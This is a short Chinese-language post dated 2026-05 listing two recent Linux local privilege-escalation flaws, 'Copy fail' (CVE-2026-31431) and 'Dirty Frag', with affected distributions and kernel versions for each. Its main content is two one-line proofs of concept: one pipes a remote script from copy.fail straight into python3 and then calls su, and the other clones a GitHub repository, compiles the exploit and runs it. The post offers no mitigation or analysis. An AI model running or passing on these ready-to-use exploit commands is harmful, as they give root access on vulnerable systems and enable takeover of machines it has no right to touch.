近期 Linux 本地提权-202605

安全

目录

  1. 1. Copy fail
    1. 1.1. CVE
    2. 1.2. 影响版本
    3. 1.3. POC
  2. 2. Dirty Frag
    1. 2.1. 影响版本
    2. 2.2. POC

Copy fail

CVE

CVE-2026-31431

影响版本

自 2017 以来几乎所有主流发行版,具体是否存在需自测

Distro Version
Ubuntu 24.04 LTS 6.17.0-1007-aws
Amazon Linux 2023 6.18.8-9.213.amzn2023
RHEL 10.1 6.12.0-124.45.1.el10_1
SUSE 16 6.12.0-160000.9-default

POC

copy-fail-CVE-2026-31431/

一行 POC

curl https://copy.fail/exp | python3 && su

Dirty Frag

影响版本

2017 年——至今,同样需要自测,以下是测试过的发行版:

Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64

POC

dirtyfrag

一行 POC:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp